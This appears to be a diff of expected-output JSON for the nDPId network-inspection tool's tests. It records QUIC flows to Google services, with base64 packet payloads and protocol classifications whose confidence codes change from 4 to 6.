02302{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1621516405310,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621516405310,"pkt":"AAAAAAAAAAEATej1CABFAAViOaNAAH4RaqmokEAFwUSpZOPvAbsFTs7oyv8AAB0IzUnHeeUSQdQAAEU0YnBQC8L89wEgTmmr7BjHFODkqhpFJVx7yJAYrFg6afkiF3jCqd3RVPDW00NRXnMgjonKH81Ileorn5KxvS5+yQJRAfjCUHJ24j9a3WWl0AFqEbkF0TWWqMTP\/2idN+3yLS6puV95VhaYgqHrCvwkD4lAh7BWrsu31e\/HDOBztqIAj1XIxQN5nk4xsMisv2NZkICaS+1Cze8naUXXyoJiwMgIqBi5y8cABXF6JlVU6OWprkzVRIYKgbzPUVlJaith2PL9DAVy2TL8feQIj3EkaywH0gUPZYTZigDwJE1mDupdge9S6g+LSrQwDNdm8DmnC39N8zuv8VkX39gnJjPPIqLqt8YcZBaksYIxo+UVtdEoMWKD2dTTAbqL3muQp2Ja7H8Ae7XPH8EhKuwd7Kj3JTpB13ljCjHYeyiv5t8QcUXs+\/fTX+iNUrbYp27UUsB5CR6dNjgUgwn+qI9Kd2TVTpJFA+nvmNxH9t5xpLsEajZKGz0zBOH+ePQwjH4k6LiuIOgTcn56cc2K1OQr8g6DG6GL3qoUWI2dlMl0vWT7aDPYShopw41gzuRGjFELxdiX0M0b7As\/7rFy3G1wt+nR8GFD6BSLRMcYNH8HNXRu0MQO53XF18R+1YeIMH6X3b3CZuFq3Xfa2QILxODzwdrxgCNv+FS4NubkKVmTPXQe+uIgvq1qlryrWj\/xlUbBxH9IDjnd7Q4EC0wXt9aAeFTNi4El0ZGUFtEehFfXIXvGMKzGNTezfNJc+vD4F1uOWnnlAxd\/WNW79xPmd8oVDAkAoVRbYCE9wA05lkg9NHNsSNZQ4ZrHcfUP3vf64MKK+pkwlt\/1KIFbaqjllgaHwuNOpxQyFKZGOQ4mRm7MxKALa4\/fjze0Xdw0la4zY+K2Z6UBx0Bbe33vd2rVATAwh3fRljk25dM6tgVCsvKusLkEvU9VmPywN52CzB84wZBRt5xcE29SdbS99xZjGg98qXqdNlTjjAt8yu4XiAjezSVKKaQD3XaLeqSlZUs2O+44zB3zNNhhO5e5eFJ7vU6rWJlnEoMb5o7Dpqgg5GZm09GTgXY6uCnh4ZTxl96ofiZvX7ChhymeUh74eA1f1x3k5LEP7B+VvfkqNzqwQdVy+JB7y82M7PRA6h\/ZiXREpEY5E7rUhHhHzsCHTcFbeJCcw1KDmA\/8lN\/ad5x9wDVKuns1EoyFDZ39IMuXsGoV5K49EtAXhlRXfF2+Q4uYSZtKRw+dUt75YzrYSQ29ZHDGQClAhl8wOBfpzHpggjQ+gFIEYw0xq4417mXTvRAsHPlxM8bRQ8PcXIpBD1+\/T32bKmOrmzAVOK\/uM2XxkngmepayHjfPWCQlEhv1MTTUXO5FOHEIKK7YeWXB+45P5Jdn5DUTLIpWlu36Orwifl8JevozrwmxoIG1Zmf2m08oeXHqRUDXmNzjkDF8iRRGAJYOtcDtsPuCEzBA8dRTgS0HKprk4UBlCXOdnUl0o\/GH1EJbFeV6skk5xrmue7uPiLAyEVcPX3pmiAAOX53KWWhMQls04leVWEcDeyAFwvaITqnSDWVveqnmXMRxLOFZt1iaMGSJOlk+UqoJqz6OkW7fNx\/lAaehebe7Eqav3QkkugEaA1AnUOpe9DMxV3jHzO0ZsRV9G3EYn8EZ\/3pjUJ7Wdzgs2pUQKiy\/\/eGQsIQ+E9g46xeFn8UPrN8eiX3DgHzFdvQqN7n6GdAWkhJ2Tw7Bq6m8tC3wcytkE68x8FsP0lQnhvRc9Pi1wMCcL9Y5E9amIXbruhOYiuKw"} 02310{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":109,"flow_packet_id":3,"flow_last_seen":1621516405464,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621516405464,"pkt":"AAAAAAAAAAEATej1CABFAAViOaxAAH4RaqCokEAFwUSpZOPvAbsFThhFwP8AAB0IzUnHeeUSQdQAAEU0f14nS2wsq94otcbsx9Ja6N4Gglxg3u9DN5aawqtRKVNC4Pc2eIsI1t2bGSVlKf0XWigbLFgVoquYysOzgfEuJL\/MeSu45JN0vCO\/piH8bKThjLOmClUk1DH3WZNkFkEuaa0+lysZpqiBVvoWBmVXL7ELlhz6YnN18zze0\/2yDF90B6el4fx\/mt0wpW0qVA1R3rpNHACrqE8RyK6pVoPq3imcpEoLb3yO7yzrRrQA3ViWb4CcRSIQKKKvWiiBsQX5n0+0thXLMnu8ftL8SuxBDfepRmuDXajiiY60A0Ci0Vc1tK667yMn9eaC6rHTNh8nYovYhgNBYmIAwvsQCVPuw3uv7zcZj7QuzsQ+GoW7Ofo+0HVPqQPw3Fcv1w6\/sFDHM8ZQdgy\/TI9Xw4zrv10NHy01l+JQvzxLdL\/Mei6EzaqwXfOyDTaHClmTcUbiuXBRX2Vf7Bmroal1PmgVVCAi8AUTkagzmJDy6vDj2SKbbL\/ReTgBtoJf9YG9\/p5Hob\/OMMIyWWppTPBk2+0f1VYPZWnbqV9qBkb6EhNQ+49gd87e+9YYhhx1IWTlW9NLOLBaYwQFgXd9bbWWfmi29OGPyG3EG8nQHPU1eOA30M0hAL1iFzuLQ3C1KXPfegclGVZOp1CvUfjShhvg8c1OTN5s7Ps6ZLZZlgyBt9X6JmRDmehOI4NTymHV5ZtQR2lVl2TcptleL6k53AnKbBYD6fZ1m7Qm7wPSMZDBJsGDW2W75tps0sDwHgF2FlcJxcVSumnK5OY0dgyq\/v+QuVFHSKHpcM0iQXjJ9BYDELQJZka6TvX0wkBv\/HQW+INffppmt4qy4pX8Jnbh3Ni1t3tDnQ\/7fweO\/+RdKUkMiQ2HCjJPyE0ETTcZK654vByA7SxI0bxGOyrV39JtcFOkThujeZSYhhZM23Dz4XEH9y6JuKs63RrvY0IkUQVSK6GA0tRTMG3mwmAob\/hfPnlVRnA2pVbvTMeZUlWCHFzts0AL9+PXmCSER\/XfzrXwjfrJuvzm+7T\/lFRR+d\/i0xl2X0IkHFkuV9wydT+v0RqXfar5ItGT\/sh5mrWNveBVdVlQJkyY8DBePhN4ArItPiFG+htl6KN6q7WQdvLajCgHRaRtH4GQxWZtZmB1Fg3DZcxEek8e2BMmaOPY8gBgng9q608TDXo9Pt5mxnWStws0YA06UTqWaNh1x2Une7VSFk8tH41qCiAI\/n2bLjiAoqnpJB\/cQvnfvFuY74Da9t\/5SFaJC4LXt0ZQIRJhn8fMIsa+pDVIU+8qnOzaJqQU5AktC9HbX1ISQRPrusR+iRsZxLKNNS5lj2e3YvJYsOdA4xy3eH3PevVRBgLucZfc8W1Sg+7crP5FPF+V1oksLUAomnQAM+uLnpl7jWA5eWJfsqJT8r5wB\/HXm64IPwfS6kzQmr04rkzCSj4t9jKRGjOo1Cs0M2KVTyz5diNk8DfzKuTIVdn5aJBg\/JHs6Tfr60kgcyC4b4P7qkvjih7e9lIaD1s7QzKhQlA9RuZPuSNUkJNf9zFhAHrlKpelaHjuvOMD7bCvtJ13MWT53xGxxb3Tn2yae9wN5yrxBUdBvqKCc9sg8zRym9VCJUCAOFTs3LmsHQjtM74VOXrdEbkzWhp3f7mXZ2mms9zJ9eH6fhPzVnmEuOhWdc4vKs4t+Uni9Rz2QUxiNfcPb0AlKfZGRFS5DchrAfVT1vo9USbhMF3YNpBh\/huOyVHNzkm1++SOaPkTBO1wZlmVb\/GUDFQCUtbTRtKz5EY5n6osCa5b"} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516418037,"flow_last_seen":1621516418037,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516418037,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"7.71.118.27","src_port":57319,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02316{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1621516418037,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621516418037,"pkt":"AAAAAAAAAAEAYl3ZCABFAAViOjNAAH4RV2CokEAFB0d2G9\/nAbsFTh7BwP8AAB0IqOC6BJZvV6IAAEU0Dvi2qrd23QDxGu2B7vaN4MOlDBtGvpoN5pHp26m14lzRY20peRtUuQ9ptItsXATUG7EiTr9GCdRPLOQETwFtC6RhGNIdLTwnsdX1wtpxLn88sqordHPzeZRfgg7Si\/hIcgk2r6jQqYTKPyb2EXPMZun\/DZnzAKBT4U0s6IkU9DCx\/nVZgKb8ZQ0clSgRRcfwhUHErM8eTU8YJIOg18cKJLd06pcQOIJG7NWuFWxlP8hu\/nN0AYaI66fR8yko7HlWLvum1JaYm6FYnzxA32PBj5oh\/7LgHk9DvkAOButBFcUmyPrB4mG5I1fazNr3nwyskcAAwio84ahFtiK2AWGqstVtlbFkBz5vU1GgAY\/jFxeFFhQU9bkVT2J83JetFccigg0SDPuD5n+d+pF1ktpVFhfg9Pf7M1yVpEd2pTwggR6\/RMwbUXsIy6V\/3Zdy235MvBR99y9lqd30EtEWQFDwQx1rFv7OgXmz1sC52olWXTPJJtqeru5YJ4y1QXdwzngLTKdWwkivONoSni7YFaQywfkoSfUUq9yPIHkBPfRgLZjtRnJvNRzSUdIVLK+82oMRpqWSDyuehe79xRqTV3emacrIoUpKNe4ES0rwwIIxuczcriuAc\/oh36BCnJTnMLsUHOv35tL0tIW69QW2mqLxjVxs\/sB2ZTY81BvXCGKlb2GWWEZboz4kvNje42VnawDq2ARmXLjmZvqx5KpuiDDLCrFuudk1KPohXg8MYwloe1Z5ljen+Kflp\/0GhTarwpApPLhqD4dC0YGPGUPWy0M3SdsjYAYnO0ufi0JY1lS9wKfFr3M11xtfXz4eInUnYb5wKqBRyjzjYcDgMIhrig+xpGm3NO62u1F2ixUHh\/2sre7Dp47yLp70MwKIP+adl\/aS+nE3ZwouBFKcqjSAsPBSGZchE52M44ofrHvjCdZygdjpUAxYA3pbEVs8jkZwgMgJXo11MS4xaeJGvyTRcdWxgO7Z6GiCANH9t3fYZEhYzw2EjE5ykKJRHZRafzyzvQldpdzPPsPIEmtpkI3mtt2v+1cYj4DnaZTXJEzplScTixfIquKqwVCom+EBWD3psfkqjfjfGGAzGt5GoJ\/n556S51FLopQS5Sp3W5C+2M5ojItue3RQCrCTIS76Pfo66q4GsAOSUZ7\/hMt\/XWeMLHxlw2ixjPGWceCE+ADtTZrMdCOe\/3\/KfNqayz9c7lfFveFHD4SoBgMlybRWMCo89EVr9\/e9bgIvQH\/2HIKL\/1AnrBTYWGwjYvXcCZMo2XZ48Bf4TAHJOLQ27twcS66XbobssW7dEGTHzsxM2cbXA7Mt66nR8kV7FnqvM3Uw37ERNKYGRDJpbb0E5DL0AIoUX6jOOuHNgnhFdj03d8npRdhJrYtWfh1KUyehyWQPyGItDjRZyrH\/YzmHmQlGRGfRB2IOJPpW0Awf8t3u7i7GhjjxzZWH9y\/5\/UIGZyFN5xYeSW1RjHpBsgozg4u5tX+KFm7iqwM265C9T5IiUFRDJ7Y7z+ArBTMIKqef2Q0Utflwho4O5OPtNfbJpYHIlEDdM\/bpqXNeLkZvsI55ncrNB0jXRjS9R\/pqCZ1F8bfNDlgCa23mWVU\/e5BsYcM6YG+DEAJXDSOtIC6Sp\/ZcQNS4oqLP9h8MI0zXLT58ZIPXRXVMDFrxMhBGx\/6yOIu\/74H\/Y3fHvm7xBKcdhdXm+aB2FiySmLOWsjvBXvSzYQ3UF0qKHH+MtZqFhGOCJk+EykBVABGv1Auw7saDcOGWE1z6rr+udwYUhMrL"} -00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":176,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516418037,"flow_last_seen":1621516418037,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516418037,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"7.71.118.27","src_port":57319,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"quic": {"client_requested_server_name":"android.clients.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} +00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":176,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516418037,"flow_last_seen":1621516418037,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516418037,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"7.71.118.27","src_port":57319,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"quic": {"client_requested_server_name":"android.clients.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516418245,"flow_last_seen":1621516418245,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516418245,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"53.101.228.200","src_port":60919,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02314{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1621516418245,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621516418245,"pkt":"AAAAAAAAAAEAVM4PCABFAAViOjhAAH4Ruo+okEAFNWXkyO33AbsFTsjCy\/8AAB0ICh\/nnOWyISUAAEU0\/XSWRRoxvD58Z\/\/ltqn4D7VEFtfFH+jUGx0Einkv99\/DSfc2oPJY4DDN6JlHAc\/qXovlR01o81cgEAuTHi81V\/Ai4h2uKfJC8zpGb4iU8J9MQX3bFzSnnvrH0McYkR8dXhY+LkUeHEK56Er3NWFCyGj5bFUc6ULxpQIONyO3XCblXJAYYR1+HHMJV5rzq2a0tPhEQxMvfL9U2zDwAk9Znp3W+SBmkWdokjyAXwhbri5sLFI+o1IwVydXvtiLNEKZ6k23ZHvOevpJuly8FUhJlRZFzpQcsb8oqZg2pRE9C8POq2T6l9g2U9I6GvHiVjRZ98FT9qIvvDP6AD69Cajx3mGJWavv6aTsctL4VNEVQVix5W4yMVeC9v64prq2LuRUPHyNnEo9AoCfcOTMnnedkniclIIocpUSham+VwWsPb7ZVt6yBxcH8dnhbZwZX\/awC1yWaJ9PMxllHy6dWdwFXphZE0mlFrVD+Y2ViRFeWYhgXMd36a67EAh4KMOW1UUy9WRijdPxYzI\/3NPUKYw67EbvuD9TnJBZV9swUxHRb5oKjIJs\/zVJKEr4HgEriVT\/uHrCBUdG8YtziQ0VN1Hy\/c\/HszvPKD1I+6T3S74uGqEDJvz22fQycnxExC\/v2s2Io82JRN0DQ9+5+lgxD6yIJqUZ6xtHI\/7Qf+h1fMLSx4y8AKIJtJIOrgnAYrglEsKTnvJuZ\/7orf+yJX+h9BvEb+CqTGkkDjnK33BqpeiRlD+D5DuP3K4T+NB+diP9DR5dBkwLMLSdQF7qGWEWn7GBAMAcRho5edT66etmLlAdwVt2TRqnGXiBMNQSBXoW+toMKpTp1vnHlBgZmKFlg\/JJPZqOdbJdAyv3zJJRFPTBKEQoIS3zCUzYSTKEr7ud8E+tffKkIrAJ7EUAESGEhVWCM1DXL8i9M+Q9XJE3DJQpsWg6gUa9Fw98FeLlP+7TL0IhvOxx5LUeAalBQ0TKxj\/VCVN3UvSZDTeC9WpGfDhna9DGtD1xTnAi7jRi4CrseNR2IgaLm5JlbfkFLKccFrhInfwGJgkHj29LRsGRm1Es1jqRY3Ouk6bpGmMNWzcEEimo3csuOG58WiAdQz6WHsuiuYVG0DLgVi9H6doI1wsGghSdqDtHqoEwoIgb3tx5I7T\/h1Xq5LT9kt\/Uk5CeAEtSXIu4d9PJQM7OynI4I4wJApaL+JsbkbYJmUckRDj5+DcoOsYJRi+S3AzB\/jReXlCiXkDNx221LihD5QvdlILM9b41NYS1jREAGiqCaAAzmvoR5TwO\/4AEr0UdVZbLG6KYh5QUiJ4oy\/WVulKKHF6+TFf4tv4Um+NQ3oK95TXCRvmKZ3qS4aLtCdIbdrNCgVhBzlGHMjvmy6t7Qw421ogxqBJtm793TVCYZwBcnNLdGCCZCEtVQnfQzr8G1JOR1oO2iM8csHv28RhmsRXcaa4e0qdrR5f3akye3zgahdcjiXHhM7C+O7G\/1kLFug8TwlbhRgFQM9CkofyNV0s9NwP\/y3Hufd\/UIKneZE+EIy8AHj+5ijv0WoRhBnRJXYX5ycxl46tMEue8ARKo9MQUXx8V0we4qyXSx8gTP4pifQiQH82C4d\/Ia+gl\/7V0nVldVjo2XHTYnNKRl\/2r20w59XqRfVr2MyuvliKCJuXMORzGbGFmNF4tyPP98C4DrzmbvG593DjxQEJxLOd9WIDUQLYmSmdG68jG3Dj38xlZdbebj80NJ8y84A3+pm6EmRMXvK3LUyTKkRh1+p8LOow4Hx0dv+gfwFZd"} -00937{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516418245,"flow_last_seen":1621516418245,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516418245,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"53.101.228.200","src_port":60919,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"adservice.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} +00937{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516418245,"flow_last_seen":1621516418245,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516418245,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"53.101.228.200","src_port":60919,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"adservice.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":178,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516733869,"flow_last_seen":1621516733869,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"144.237.113.58","src_port":50423,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02313{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1621516733869,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621516733869,"pkt":"AAAAAAAAAAEAU0VlCABFAAViPaJAAH4RzyuokEAFkO1xOsT3AbsFTgHhyP8AAB0IbGyalH0+wYYANwDvfHyuzX0WyfJVw0PoKIyEKIwqfBNF14sFAvA9Fx6LB3xU9vL3ynu5LnbexvzNtyumb4fpTS5E\/XHfpwPYpXecyozflPK20TknHSDUVHAJTY9iUBdGsc+gRxEKw\/EnD4N0ApvBGoTWqmVkqyn2sk121zbYGDW6ErU1q+8hsbyKMoI4NfxjBnTspog\/m+eaL88Tqahvr6VuGmJOgsgyl\/gwce2fwd+d9PpunMJSkAS7yf2o1eZhJh9pY3klOtwZCFNQuDUJCJjazTJU7eVP\/0CtOYR0UdFKjm+WWzcoEB4VQS03kspRhaM2QP\/ptwjbxo6FO3oCmYBuOzT9NnCTurb66djTzhBQ7nPe1yBZiq6US4GpZG6aMK89NuAY5\/nz1pP2DYT5YcgrfYdhQ4YARsc04zYfLezdFb87pJyoch2m94u7HYMn24Xcbst7wof0dZvjDWkyw5cSFT4dsIwT2M8hyrtH3HjdLtgpphSCdYSyGuy9OvG7sn+MF0Jh5\/oJdnlWn\/USneemL\/aWfg+AXzhA\/IStwKORkQ6adbv0MxxQxhdhVlhABYhBf0naSCmQM2+cEelsB22JQdGyxVRZOb7H2e61nRmdya7eNqT+fobtyVJrZCrcoLN2LiU5dsnsqDNucCyYvDEkyd7kQp9qzPoYerFAw+PP\/vmmBvfd8Jm5zV8ExYYVZcEdRnY4EYoOzAPXdClrK9VuYF8c\/Y6ePAmXEmR1uClCx1ITHFshaCJhAhfyTByXjbfw\/nXGIZwveSnxeIYy1iabwqW2LFKaTx+JSk2nPQUZJdp\/gZHAXMi8UAeayRLCWh88FjEs+voztNRueCatb6uKPMygUEMEU+6M57k2I2+uTJVrFNtw0naiFrNM5aQWh\/8BtW73kEKOXlb2OOpWG33SsbDbt8f07KgzTSjaTcH+ym5fia5Rw7fV\/ORX4hRDVw6rpMBK8vHEzILGzqKPp\/Fzgy8Yu3yhNuwLA8BgUfSc1ByPGepdUQ33vZYRwkYXJIqjHVWQAfskEje0Wqn+YSnYlWZx7JpLG6MxX086GP6N+oCsmXNLxDtBJtSXiGmOVBp+cXeY5yNiplAtTeIdcdjOB66FqojPXZ4qFgzu67AqMMGZObJDMv\/Z4GW5X4Cgb4uXU+hjHX87oTa1YVxX0+H5LL9RQod7rJgo0j7m61cBp5xGUl\/xYmnsu3DdfPulCdT\/Xqvq9mDtvBpKPSZ89x120bFELyq+h\/m4PzITFcG5b0xOCTSTGB34QH9z4hfUNaP+WHZEXy5YNzh9YM1YXqvIrO+\/iwEMLfq33bR4jnXtPX1cFX+a4qrWOvuTa+bfX7Di\/IJNdHWVlIftUcO6+NFoLKQszqgdSRApeMWkwSgeT6R7yYowqnttX1EOkto0U21n9qsOOcZHS58\/p7UHB8lQVB8xDJnHjAwe2Yv8frMkPRsbdRaenhBn\/LLWS\/wyADvhqIIoQldbThikVaSXVwKU6ENOBP1gszcRFozOxr8R01PtBlDQ5QyH2EVc978OM4JjBCTbqtEjexBUwzGSaTGclsLHYMS3BuvKzOU5hVb9zTw+6jJKF0aIvgkbJVna7j07Xp335dcN+9bFri7aa2E4BpLCzZy+JNpokrgVDpYRk1pV3jGV9trdQsOs8CADI3foMn58d7Q949RGX2Zl7pv\/I5Gf1FwKxygyeU0D5cHoY5DXRYbGRoDOtCFxU18L0wLOrSKS8JC+eITcsIp6lD+\/42Vg3uHHr1yzTR3Tr7duzZ5RxafR49orBGtHZqde"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516733869,"flow_last_seen":1621516733869,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"144.237.113.58","src_port":50423,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"37b57e2a60f871d6f459268f91669a78","tls_supported_versions":"TLSv1.3"}} -00740{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621516418037,"flow_last_seen":1621516418037,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"7.71.118.27","src_port":57319,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} -00740{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621516392616,"flow_last_seen":1621516392956,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"126.3.93.89","src_port":50224,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} -00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621516401935,"flow_last_seen":1621516402235,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"31.219.210.96","src_port":62719,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 